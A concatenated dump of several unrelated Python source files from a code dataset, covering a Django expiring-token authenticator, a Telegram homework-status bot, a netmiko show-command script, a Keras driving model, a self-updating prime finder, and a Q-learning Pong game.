[(\"Confusion matrix, without normalization\", None), ]\n\t\t\t\tfor title, normalize in titles_options:\n\t\t\t\t\tdisp = plot_confusion_matrix(classifier, x_test, y_test)\n\n","sub_path":"vy/vy/spiders/threads_spider.py","file_name":"threads_spider.py","file_ext":"py","file_size_in_byte":21359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605513188","text":"from datetime import timedelta\r\nfrom django.conf import settings\r\nfrom django.utils import timezone\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework import exceptions\r\n\r\n\"\"\"\r\nCurrently using hours for testing. You may want to change \r\nto minutes when pushing to production\r\n\"\"\"\r\nEXPIRE_HOURS = getattr(settings, 'REST_FRAMEWORK_TOKEN_EXPIRE_HOURS', 2)\r\n# EXPIRE_MINUTES = getattr(settings, 'REST_FRAMEWORK_TOKEN_EXPIRE_MINUTES', 15)\r\n\r\n\"\"\"\r\nChecks the user's token to see if it expiring or not\r\n\"\"\"\r\nclass ExpiringTokenAuthentication(TokenAuthentication):\r\n def authenticate_credentials(self, key):\r\n try:\r\n model = self.get_model()\r\n token = model.objects.get(key=key)\r\n except model.DoesNotExist:\r\n raise exceptions.AuthenticationFailed('Invalid token')\r\n\r\n if not token.user.is_active:\r\n raise exceptions.AuthenticationFailed('User is inactive or deleted')\r\n\r\n if token.created < timezone.now() - timedelta(hours=EXPIRE_HOURS):\r\n # if token.created < timezone.now() - timedelta(minutes=EXPIRE_MINUTES):\r\n raise exceptions.AuthenticationFailed('Token has expired')\r\n\r\n return (token.user, token)","sub_path":"src/accounts/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419919305","text":"import os\nimport requests\nimport telegram\nimport time\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nPRACTICUM_URL = 'https://praktikum.yandex.ru/api/user_api/homework_statuses/'\nPRACTICUM_TOKEN = os.getenv(\"PRACTICUM_TOKEN\")\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nCHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\nPROXY_ADDRES = os.getenv('PROXY')\n\n\ndef parse_homework_status(homework):\n homework_name = homework.get('homework_name')\n if homework.get('status') == 'rejected':\n verdict = 'К сожалению в работе нашлись ошибки.'\n else:\n verdict = 'Ревьюеру всё понравилось, можно приступать к следующему уроку.'\n return f'У вас проверили работу \"{homework_name}\"!\\n\\n{verdict}'\n\n\ndef get_homework_statuses(current_timestamp):\n headers = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n params = {'from_date':current_timestamp}\n url = PRACTICUM_URL\n homework_statuses = requests.get(url = url, headers = headers, params = params).json()\n return homework_statuses\n\n\ndef send_message(message):\n #proxy = telegram.utils.request.Request(proxy_url = PROXY_ADDRES)\n bot = telegram.Bot(token = TELEGRAM_TOKEN)#, request = proxy)\n return bot.send_message(chat_id = CHAT_ID, text = message)\n\n\ndef main():\n current_timestamp = int(time.time()) # начальное значение timestamp - текущее unix время\n while True:\n try:\n new_homework = get_homework_statuses(current_timestamp)\n if new_homework.get('homeworks'):\n send_message(parse_homework_status(new_homework.get('homeworks')[0]))\n current_timestamp = new_homework.get('current_date') # обновить timestamp\n time.sleep(1200) # опрашивать раз в 20 минут\n except Exception as e:\n print(f'Бот упал с ошибкой: {e}')\n time.sleep(5)\n continue\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"199948298","text":"import logging\nimport sys\nfrom dataclasses import asdict, fields\n\nimport tornado.autoreload\nfrom http_client.options import parse_config_file as http_client_parse_config_file, options as http_client_options\n\nfrom frontik.loggers import bootstrap_core_logging, MDC\nfrom frontik.options import options, parse_config_file\n\nlog = logging.getLogger('config_parser')\n\n\ndef parse_configs(config_files):\n \"\"\"Reads command line options / config file and bootstraps logging.\n \"\"\"\n allowed_options = {**asdict(options), **asdict(http_client_options)}.keys()\n parse_command_line(options, allowed_options)\n\n if options.config:\n configs_to_read = options.config\n else:\n configs_to_read = config_files\n\n configs_to_read = filter(\n None, [configs_to_read] if not isinstance(configs_to_read, (list, tuple)) else configs_to_read\n )\n\n for config in configs_to_read:\n http_client_parse_config_file(config)\n parse_config_file(config)\n\n # override options from config with command line options\n parse_command_line(options, allowed_options)\n parse_command_line(http_client_options, allowed_options)\n MDC.init('master')\n bootstrap_core_logging(options.log_level, options.log_json, options.suppressed_loggers)\n for config in configs_to_read:\n log.debug('using config: %s', config)\n if options.autoreload:\n tornado.autoreload.watch(config)\n\n\ndef parse_command_line(options, allowed_options):\n args = sys.argv\n\n for i in range(1, len(args)):\n if not args[i].startswith(\"-\"):\n break\n if args[i] == \"--\":\n break\n arg = args[i].lstrip(\"-\")\n name, equals, value = arg.partition(\"=\")\n if name not in allowed_options:\n log.error(f'Unrecognized command line option: {name}, skipped')\n continue\n\n option = next(filter(lambda x: x.name == name, fields(options)), None)\n if option is None:\n continue\n\n if not equals:\n if option.type == bool:\n setattr(options, name, True)\n else:\n raise Exception('Option %r requires a value' % name)\n\n if option.type == bool:\n setattr(options, name, value.lower() not in (\"false\", \"0\", \"f\"))\n elif option.type == int:\n setattr(options, name, int(value))\n elif option.type == float:\n setattr(options, name, float(value))\n elif option.type == str:\n setattr(options, name, value)\n else:\n raise Exception('Complex types are not implemented %r: %r' % (name, value))\n","sub_path":"frontik/config_parser.py","file_name":"config_parser.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472059433","text":"# -*- coding: utf-8 -*-\n\"\"\"\nЗадание 19.2\n\nСоздать функцию send_show_command_to_devices, которая отправляет\nодну и ту же команду show на разные устройства в параллельных потоках,\nа затем записывает вывод команд в файл. Вывод с устройств в файле может быть в любом порядке.\n\nПараметры функции:\n* devices - список словарей с параметрами подключения к устройствам\n* command - команда\n* filename - имя текстового файла, в который будут записаны выводы всех команд\n* limit - максимальное количество параллельных потоков (по умолчанию 3)\n\nФункция ничего не возвращает.\n\nВывод команд должен быть записан в обычный текстовый файл в таком формате (перед выводом команды надо написать имя хоста и саму команду):\n\nR1#sh ip int br\nInterface IP-Address OK? Method Status Protocol\nEthernet0/0 192.168.100.1 YES NVRAM up up\nEthernet0/1 192.168.200.1 YES NVRAM up up\nR2#sh ip int br\nInterface IP-Address OK? Method Status Protocol\nEthernet0/0 192.168.100.2 YES NVRAM up up\nEthernet0/1 10.1.1.1 YES NVRAM administratively down down\nR3#sh ip int br\nInterface IP-Address OK? Method Status Protocol\nEthernet0/0 192.168.100.3 YES NVRAM up up\nEthernet0/1 unassigned YES NVRAM administratively down down\n\nДля выполнения задания можно создавать любые дополнительные функции.\n\nПроверить работу функции на устройствах из файла devices.yaml\n\"\"\"\n\n#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport time\nfrom itertools import repeat\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\n\nimport netmiko\nimport yaml\n\nlogging.getLogger('paramiko').setLevel(logging.WARNING)\n\nlogging.basicConfig(\n format = '%(threadName)s %(name)s %(levelname)s: %(message)s',\n level=logging.INFO)\n\ndef send_show_command_to_devices(device, command):\n start_msg = '===> {} Connection: {}'\n received_msg = '<=== {} Received: {}'\n ip = device['host']\n logging.info(start_msg.format(datetime.now().time(), ip))\n\n with netmiko.ConnectHandler(**device) as ssh:\n ssh.enable()\n result = ssh.send_command(strip_command=False, command_string=command)\n logging.info(received_msg.format(datetime.now().time(), ip))\n return result\n\nwith open('devices2.yaml') as f:\n devices = yaml.safe_load(f)\n\nwith ThreadPoolExecutor(max_workers=3) as executor:\n result = executor.map(send_show_command_to_devices, devices, repeat('sh ip int br'))\n for device, output in zip(devices, result):\n print(output)\n f = open('show.txt', 'a')\n f.write('\\n'+device['host']+'#')\n f.write(output)\n\n'''\nios-xe-mgmt-latest.cisco.com#sh ip int br\nInterface IP-Address OK? Method Status Protocol\nGigabitEthernet1 10.10.20.48 YES NVRAM up up \nGigabitEthernet2 10.255.255.2 YES other administratively down down \nGigabitEthernet3 unassigned YES NVRAM administratively down down \nLoopback2 unassigned YES unset up up \nLoopback100 1.1.1.1 YES manual up up \nLoopback109 172.16.100.1 YES other up up \nVirtualPortGroup0 172.16.0.1 YES manual up up \nVirtualPortGroup2 192.168.35.1 YES manual up up \n'''","sub_path":"19_concurrent_connections/task_19_2.py","file_name":"task_19_2.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"474502277","text":"import csv\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\n## Parameters\nprint('set parameters...')\nside_cam_correction = 0.2\ntop_crop = 60\nbottom_crop = 20\nvalidation_split = 0.2\nbatch_size = 32\nnb_epoch = 5\n\n## Load data\n\n# read csv files\nprint('read csv files...')\ndata_folders = ['data/']\n\ndata = []\nfor folder in data_folders:\n with open(folder + 'driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n next(reader)\n for line in reader:\n # use all 3 cameras\n data.append([folder + line[0].strip(), float(line[3]), 'normal'])\n data.append([folder + line[1].strip(), float(line[3]) + side_cam_correction, 'normal'])\n data.append([folder + line[2].strip(), float(line[3]) - side_cam_correction, 'normal'])\n # use flipped image\n data.append([folder + line[0].strip(), -(float(line[3])), 'flip'])\n data.append([folder + line[1].strip(), -(float(line[3]) + side_cam_correction), 'flip'])\n data.append([folder + line[2].strip(), -(float(line[3]) - side_cam_correction), 'flip'])\n\n# read the image files\nprint('read image files...')\nX_train = np.zeros((len(data), 160, 320,3))\ny_train = np.zeros((len(data)))\n\nfor item, index in enumerate(tqdm(data)):\n image = cv2.cvtColor(cv2.imread(item[0]), cv2.COLOR_BGR2RGB)\n if (item[2] == 'flip'):\n image = np.fliplr(image)\n X_train[index] = image\n y_train[index] = float(item[1])\n\n## Create the model\nfrom keras.models import Sequential\nfrom keras.layers import Cropping2D, Lambda, Flatten, Dense, Convolution2D, MaxPooling2D\n\nprint('creating model...')\n# use the simpler sequential model\nmodel = Sequential()\n# crop the input image\nmodel.add(Cropping2D(cropping=((top_crop, bottom_crop), (0,0)), input_shape=(160, 320, 3)))\n# normalize the image so it ranges from -1 to 1\nmodel.add(Lambda(lambda x: ((x / 255.0) - 0.5) * 2))\n# create the layers\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(256, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Flatten())\nprint(model.layers[-1].output_shape)\n#model.add(Dense(2048))\nmodel.add(Dense(1024))\nmodel.add(Dense(1))\n# use adam for optimizer and mean-squared-error for loss\nmodel.compile(optimizer='adam', loss='mse')\n# train the model\nprint('training...')\nmodel.fit(X_train, y_train, validation_split=validation_split, batch_size=batch_size, nb_epoch=nb_epoch, shuffle=True)\n# save the model\nprint('saving model...')\nmodel.save('model.h5')\n","sub_path":"normal_model.py","file_name":"normal_model.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"11105697","text":"# Primer\n# github.com/smcclennon/Primer\nver = '1.1.0'\nproj = 'Primer'\n\n\nimport os, time\nfrom distutils.version import LooseVersion as semver\n\n\nif os.name == 'nt':\n Windows = True\nelse:\n Windows = False\n\n\n\nif Windows:\n import ctypes, urllib.request, json\n ctypes.windll.kernel32.SetConsoleTitleW(f' == {proj} v{ver} == Checking for updates...')\n\n updateAttempt = 0\n print('Checking for updates...', end='\\r')\n try: # Remove previous version if just updated\n with open(f'{proj}.tmp', 'r') as content_file:\n oldFile = str(content_file.read())\n # If the old version has the current filename, don't delete\n if oldFile != os.path.basename(__file__):\n os.remove(oldFile)\n os.remove(f'{proj}.tmp')\n except:\n pass\n while updateAttempt < 3:\n updateAttempt = updateAttempt+1\n try:\n with urllib.request.urlopen(\"https://smcclennon.github.io/update/api/3\") as url:\n repo = []\n for line in url.readlines():\n repo.append(line.decode().strip())\n apiLatest = repo[0] # Latest release details\n proj = repo[1] # Project name\n ddl = repo[2] # Direct download\n apiReleases = repo[3] # List of patch notes\n with urllib.request.urlopen(apiLatest) as url:\n data = json.loads(url.read().decode())\n latest = data['tag_name'][1:]\n del data # Prevent overlapping variable data\n release = json.loads(urllib.request.urlopen(\n apiReleases).read().decode())\n releases = [\n (data['tag_name'], data['body'])\n for data in release\n if semver(data['tag_name'][1:]) > semver(ver)]\n updateAttempt = 3\n except:\n latest = '0'\n if semver(latest) > semver(ver):\n print('Update available! ')\n print(f'Latest Version: v{latest}\\n')\n for release in releases:\n print(f'{release[0]}:\\n{release[1]}\\n')\n confirm = input(str('Update now? [Y/n] ')).upper()\n if confirm != 'N':\n latestFilename = f'{proj} v{latest}.py'\n # Download latest version to cwd\n print(f'Downloading \"{latestFilename}\"...')\n urllib.request.urlretrieve(ddl, latestFilename)\n # Write the current filename to LTFO.tmp\n f = open(f'{proj}.tmp', 'w')\n f.write(str(os.path.basename(__file__)))\n f.close()\n os.system(f'\"{latestFilename}\"') # Open latest version\n exit()\n\n\n\n\n\ntotal=0\nnum=2\ninvalid=0\nfound=0\ncalculations=0\ntaskDuration='0'\nattempts='...'\nconfig=[]\n\n\n\n\n\ntry:\n with open(f\"{proj}.config\", \"r\") as f:\n config=f.readlines()\n total=int(config[0])\n found=int(config[1])-1\n num=int(config[2])+1\nexcept:\n with open(f\"{proj}.config\", \"w\") as f:\n f.write('0\\n1')\n with open(f\"{proj}.config\", \"r\") as f:\n config=f.readlines()\n print(f'Created {proj}.config')\n total=int(config[0])\n found=int(config[1])-1\n\n\ndef updateFile(f):\n try:\n if f == 'all':\n with open(f\"{proj}.txt\", \"a\") as f:\n f.write('\\n'+str(num))\n with open(f\"{proj}.config\", \"w\") as f:\n f.write(f'{total}\\n{found}\\n{num}')\n elif f == 'txt':\n with open(f\"{proj}.txt\", \"a\") as f:\n f.write('\\n'+str(num))\n elif f == 'config':\n with open(f\"{proj}.config\", \"w\") as f:\n f.write(f'{total}\\n{found}\\n{num}')\n except Exception as e:\n print(f'\\n{e}\\nThis was likely caused by prime numbers being generated too quickly.')\n time.sleep(0.1)\n if str(e)[-2] == 't': #.tx(t)\n updateFile('txt')\n print('\\n- Storage file updated')\n elif str(e)[-2] == 'g': #.confi(g)\n updateFile('config')\n print('\\n- Config file updated')\n else:\n input('updateFile() Unknown fatal error')\n exit()\n print('File system is now up to date!\\n')\n\nif Windows: os.system('cls')\nnR = 'true' # New Round, track when a prime has just been found in the loop\nwhile True:\n if nR == 'true':\n taskStart = time.time()\n nR = 'false'\n\n while invalid == 0:\n if int(str(num)[-1]) % 2 == 0: # If number is even (ends in 0, 2, 4, 6, 8)\n total = total + 1\n calculations = calculations + 1\n invalid = 1 # Skip processing the number\n break\n\n for i in range(3,num):\n total = total + 1\n calculations = calculations + 1\n if num % i == 0: # If number is divisible by a number other than 1 or itself\n invalid = 1\n if Windows: taskDuration = round(time.time() - taskStart, 2) \n\n if invalid == 0:\n if not Windows: taskDuration = round(time.time() - taskStart, 2) \n nR = 'true'\n found = found + 1\n if Windows:\n print(f'Found Prime [#{found:,}]! --> {num:,} <-- {calculations:,} calculations in {taskDuration} seconds')\n else:\n print(f'{proj} v{ver} >> Found Prime [#{found:,}]! --> {num:,} <-- [Total: {total:,}] {calculations:,} calculations in {taskDuration} seconds')\n calculations = 0\n updateFile('all')\n break\n \n num = num + 1\n invalid = 0\n if Windows:\n ctypes.windll.kernel32.SetConsoleTitleW(f' == {proj} v{ver} == Total Calculations: {total:,} --- Elapsed: {round(float(taskDuration), 1)}s --- Testing: {num:,}')\n # https://stackoverflow.com/questions/5676646\n","sub_path":"Primer.py","file_name":"Primer.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"227561084","text":"\"\"\"\n리스트에 숫자가 n개 있다면 가장 큰 값이 있는 위치번호를 돌려주는 알고리즘을 만드십시오.\n\"\"\"\n\n\ndef max_pos(a):\n n = len(a)\n max_v = 0\n for i in range(1, n):\n if a[i] > a[max_v]:\n max_v = i\n return max_v\n\n\nv = [1, 2, 91, 67, 9]\nprint(max_pos(v))\n","sub_path":"2/2-2.py","file_name":"2-2.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631237660","text":"\"\"\"\nDefault settings for multitester\n\"\"\"\n\nimport time\nimport numpy as np\n\nimport mathmagic.fun as ff\n\nfrom mathmagic.datatypes import *\n\nspace = Space(edges=np.array([0,300,0,512],dtype=float),step=1)\nstart_pos = ff.cartesian_product(np.arange(50,250))\nplume_settings = {'path': 'collimated_2d', \n 'params': {'width': 3.0, 'center': 150.0, 'mag': 0.017}, \n 'src': np.array([-1, -1])}\nplume_fs = 1.\nsave_every = 1\nsave_file = '/Users/rkp/Desktop/' + time.strftime(\"%Y.%m.%d-%H.%M.%S\")\n \n# Default settings\nsettings = {}\n# Insect settings\nsettings['move_list'] = np.array([[1.,0],[-1,0],[0,1],[0,-1]])\nsettings['stay_in_grid'] = False\nsettings['stay_in_bounds'] = False\n# Sensor settings\nsettings['read_method'] = 'poisson'\nsettings['threshold'] = 0.\nsettings['visual_radius'] = 3.\n# Motor settings\nsettings['move_alg'] = 'max_util'\nsettings['max_speed'] = .4\n# Brain settings\nsettings['util_func'] = 'neg_ent'\ndef transform(util): return util - np.min(util)\nsettings['util_transform'] = {'fun':transform,'params':[]}\n# Tester settings\nsettings['stim_params'] = {'R': 1.,'tau':2500,'D':1.,'v':1.,'a':1.}\nsettings['hmm_filename'] = None\nsettings['plot_every'] = 0\nsettings['save_every'] = 0\nsettings['save_filename'] = time.strftime(\"%Y.%m.%d-%H.%M.%S\")\nsettings['calc_on_return'] = {'source_exist_prob':True}\nsettings['calc_on_save'] = {'source_prob':False,\n 'source_log_like':False,\n 'util':False,\n 'util_approx':False,\n 'move_prob_intr':False,\n 'move_prob_combined':False}\n\n# Default approximations\napprox = {}\n# Insect approximation\n# Sensor approximations\n# Motor approximations\n# Brain approximation\napprox['mean_hit_rate_e'] = .0001\napprox['util_approx'] = None","sub_path":"wind_tunnel/old/infotaxis/config/default_multi.py","file_name":"default_multi.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439713119","text":"from cv2 import cv2 \nimport selectivesearch\n\n\ndef sift(img_path):\n img=cv2.imread(img_path)\n _sift = cv2.xfeatures2d.SIFT_create()\n key_point,descriptors=_sift.detectAndCompute(img,None)\n print(len(key_point))\n print(descriptors.shape)\n return key_point,descriptors\n\n\ndef selective_search(img_path):\n # https://github.com/AlpacaDB/selectivesearch\n img=cv2.imread(img_path)\n img_lbl, regions = selectivesearch.selective_search(img, scale=500, sigma=0.9, min_size=10)\n # 创建一个集合 元素不会重复,每一个元素都是一个list(左上角x,左上角y,宽,高),表示一个候选区域的边框\n candidates = set()\n for r in regions:\n # 排除重复的候选区\n if r['rect'] in candidates:\n continue\n # 排除小于 2000 pixels的候选区域(并不是bounding box中的区域大小)\n if r['size'] < 2000:\n continue\n # 排除扭曲的候选区域边框 即只保留近似正方形的\n x, y, w, h = r['rect']\n if w / h > 1.2 or h / w > 1.2:\n continue\n candidates.add(r['rect'])\n img_regions=[]\n for candidate in candidates:\n x, y, w, h = candidate\n img_regions.append(img[x:x+w][y:y+h])\n return img_regions\n\n\n\nif __name__=='__main__':\n img='1.jpg'\n print(sift(img))\n print(selective_search(img))\n","sub_path":"ExtractLocalDescriptors_new.py","file_name":"ExtractLocalDescriptors_new.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"313992100","text":"#!/usr/bin/env python\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n#\t\tIt's my first actual game-making attempt. I know code could be much better \r\n#\t\twith classes or defs but I tried to make it short and understandable with very \r\n#\t\tlittle knowledge of python and pygame(I'm one of them). Enjoy.\r\n\r\nimport numpy as np\r\nimport math\r\nfrom random import randint\r\nimport random\r\nimport time\r\n#Game --------\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom sys import exit\r\nimport random\r\n\r\ndef discretize(b_x, b_y, v_x, v_y, p_y):\r\n # Set vx_dis\r\n vx_dis = 1 if (v_x>0) else -1\r\n #Set vy_dis\r\n if (v_y > 0.015):\r\n vy_dis = 1\r\n elif (v_y < -0.015):\r\n vy_dis = -1\r\n else:\r\n vy_dis = 0\r\n #Set bx_dis & by_dis\r\n bx_dis = math.floor(b_x*grid_size)\r\n if bx_dis == grid_size:\r\n bx_dis = grid_size-1\r\n by_dis = math.floor(b_y*grid_size)\r\n if by_dis == grid_size:\r\n by_dis = grid_size-1\r\n #Set py_dis, the position of paddle in the grid\r\n py_dis = math.floor(grid_size * p_y / (1 - p_h))\r\n if (py_dis >= grid_size):\r\n py_dis = grid_size-1\r\n # print(bx_dis, by_dis, vx_dis, vy_dis, py_dis)\r\n new_state = (bx_dis, by_dis, vx_dis, vy_dis, py_dis)\r\n return new_state\r\n\r\n\r\ndef train():\r\n #Initalization\r\n gamma = 0.8 #Discount \r\n decay = 0.9 #Decay constant\r\n p_h = 0.2\r\n grid_size = 12\r\n\r\n Q = {}\r\n # R = {}\r\n N = {}\r\n \r\n #Init the R and Q\r\n # actionCount = 0\r\n for py_dis in range(grid_size):#paddle y\r\n for vx_dis in [-1,1]:\r\n for vy_dis in [-1,0,1]:\r\n for bx_dis in range(grid_size):\r\n for by_dis in range(grid_size):\r\n t = (bx_dis, by_dis, vx_dis, vy_dis, py_dis)#Create tuple\r\n Q[t] = [0, 0, 0]\r\n N[t] = [0, 0, 0]\r\n Q[(-1)] = 0\r\n N[(-1)] = 0\r\n\r\n #Begin training\r\n trainCount = 5000 #100K\r\n print(\"Train %d times for the pong game.\" % trainCount )\r\n trainLoop = 0\r\n Q_up = 0\r\n epsilon = 1 # initial epsilon\r\n while (trainLoop < trainCount):\r\n print(trainLoop)\r\n #initialize position\r\n b_x = 0.5\r\n b_y = 0.5\r\n v_x = 0.03\r\n v_y = 0.01\r\n p_y = 0.5 - p_h/2 \r\n\r\n cur_state = discretize(b_x, b_y, v_x, v_y, p_y)\r\n \r\n # while not fall\r\n while (b_x <= 1):\r\n action = -1\r\n reward = 0\r\n score = random.random()\r\n # epsilon greedy to choose action\r\n if score < epsilon:\r\n action = random.randint(0,2)\r\n else:\r\n action = np.argmax(Q[cur_state])\r\n if action == 0:\r\n p_y = max(0.0, p_y - 0.04)\r\n elif action == 2:\r\n p_y = min(0.8, p_y + 0.04)\r\n\r\n N[cur_state][action] += 1\r\n # Update bx by vx vy to next state\r\n b_x += v_x\r\n b_y += v_y\r\n if (b_y < 0):\r\n b_y = -b_y\r\n v_y = -v_y\r\n if (b_y > 1):\r\n b_y = 2 - b_y\r\n v_y = -v_y\r\n if (b_x < 0):\r\n b_x = -b_x\r\n v_x = -v_x\r\n if b_x > 1:\r\n # if catch the ball\r\n if b_y >= p_y and b_y <= p_y + 0.2:\r\n reward = 1\r\n b_x = 2 - b_x\r\n U = random.uniform(-0.015, 0.015)\r\n V = random.uniform(-0.03, 0.03)\r\n if (-v_x + U > 0.03):\r\n v_x = 0.029\r\n elif (-v_x + U < -0.03):\r\n v_x = -0.029\r\n v_x = -v_x + U \r\n v_y = v_y + V\r\n\r\n next_state = discretize(b_x,b_y,v_x,v_y,p_y)\r\n \r\n if b_x > 1:\r\n reward = -1\r\n next_state = -1\r\n \r\n # print(next_state)\r\n\r\n LR = decay/(decay + N[cur_state][action])\r\n if next_state != -1:\r\n Q[cur_state][action] += LR*(reward + gamma*max(Q[next_state]) - Q[cur_state][action])\r\n else:\r\n Q[cur_state][action] += LR*(reward + gamma*Q[-1] - Q[cur_state][action])\r\n cur_state = next_state\r\n \r\n trainLoop += 1\r\n epsilon -= 1.0/trainCount\r\n print(\"Train ended.\")\r\n return Q\r\n\r\ndef game_one_run(Q, b_x, b_y, v_x, v_y, p_y):\r\n #Discrete current state \r\n bc = 0\r\n dis_state = discretize(b_x, b_y, v_x, v_y, p_y)\r\n # print(dis_state)\r\n #From Q find argmax action\r\n action = np.argmax(Q[dis_state])\r\n # print(action)\r\n #Update state & p_y according to selected action\r\n # Update bx by vx vy to next state\r\n b_x += v_x\r\n b_y += v_y\r\n\r\n if(action == 0):\r\n p_y = max(0.0, p_y - 0.04)\r\n elif action == 2:\r\n p_y = min(0.8, p_y + 0.04)\r\n if (b_y < 0):\r\n b_y = -b_y\r\n v_y = -v_y\r\n if (b_y > 1):\r\n b_y = 2 - b_y\r\n v_y = -v_y\r\n if (b_x < 0):\r\n b_x = -b_x\r\n v_x = -v_x\r\n if b_x > 1:\r\n # if catch the ball\r\n if b_y >= p_y and b_y <= p_y + 0.2:\r\n # print(\"Bounce %03f\" % b_x)\r\n print(\"Bounce\")\r\n bc = 1\r\n b_x = 2 - b_x\r\n U = random.uniform(-0.015, 0.015)\r\n V = random.uniform(-0.03, 0.03)\r\n if (-v_x + U > 0.03):\r\n v_x = 0.029\r\n elif (-v_x + U < -0.03):\r\n v_x = -0.029\r\n v_x = -v_x + U\r\n v_y = v_y + V\r\n b_x = 1\r\n # if failed to catch the ball\r\n else:\r\n return (-1, bc)\r\n\r\n return ((b_x, b_y, v_x, v_y, p_y),bc)\r\n\r\n\r\n\r\n\r\n#Game ==================================\r\nb_x = 0.5\r\nb_y = 0.5\r\nv_x = 0.03\r\nv_y = 0.01\r\np_y = 0.4\r\nscaleFactor = 640\r\ngrid_size = 12\r\np_h = 0.2\r\n\r\nQ = train()\r\n\r\nprint(\"Game start!\")\r\n\r\npygame.init()\r\n\r\nscreen=pygame.display.set_mode((640,640),0,32)#[screen_width,screen_height]\r\npygame.display.set_caption(\"The Ultimate Pong\")\r\n\r\n#Creating 2 bars, a ball and background.\r\nback = pygame.Surface((640,640))\r\nbackground = back.convert()\r\nbackground.fill((255,255,255))\r\nbar = pygame.Surface((10,128))#10 by 50 pixels, 25\r\n# bar1 = bar.convert()\r\n# bar1.fill((0,0,255))\r\nbar2 = bar.convert()\r\nbar2.fill((255,0,0))\r\ncirc_sur = pygame.Surface((15,15))\r\ncirc = pygame.draw.circle(circ_sur,(0,0,255),(7,7),7)\r\ncircle = circ_sur.convert()\r\ncircle.set_colorkey((0,0,0))\r\n\r\n# some definitions\r\nbar2_x = 630.\r\nbar2_y = 215.\r\ncircle_x, circle_y = 307.5, 307.5\r\nbar1_move, bar2_move = 0. , 0.\r\nspeed_circ = 250., 250., 250.\r\nbar1_score, bar2_score = 0,0\r\n#clock and font objects\r\nclock = pygame.time.Clock()\r\nfont = pygame.font.SysFont(\"Chalkboard\",80)\r\n\r\nspeed_x = 0.03\r\nspeed_y = 0.01\r\n# ai_speed = 0\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n exit()\r\n # if event.type == KEYDOWN:\r\n # if event.key == K_UP:\r\n # bar1_move = -ai_speed\r\n # elif event.key == K_DOWN:\r\n # bar1_move = ai_speed\r\n # elif event.type == KEYUP:\r\n # if event.key == K_UP:\r\n # bar1_move = 0.\r\n # elif event.key == K_DOWN:\r\n # bar1_move = 0.\r\n \r\n # score1 = font.render(str(bar1_score), True, (255,255,255))\r\n score2 = font.render(str(bar2_score), True, (0,0,0))\r\n\r\n screen.blit(background,(0,0))\r\n frame = pygame.draw.rect(screen,(0,0,0),Rect((1,1),(639,639)),2)\r\n screen.blit(bar2,(bar2_x,bar2_y))\r\n screen.blit(circle,(circle_x,circle_y))\r\n screen.blit(score2,(320.,120.))\r\n \r\n# movement of circle\r\n time_passed = clock.tick(30)\r\n time_sec = time_passed / 1000.0\r\n circle_x = b_x * (scaleFactor-10)\r\n circle_y = b_y * scaleFactor\r\n bar2_y = p_y * scaleFactor\r\n\r\n (res, bc) = game_one_run(Q, b_x, b_y, v_x, v_y, p_y)\r\n bar2_score += bc\r\n if (res == -1):\r\n print (\"Game end, bounce: %d\" % bar2_score)\r\n time.sleep(3)\r\n bar2_x = 630.\r\n bar2_y = 215.\r\n circle_x, circle_y = 307.5, 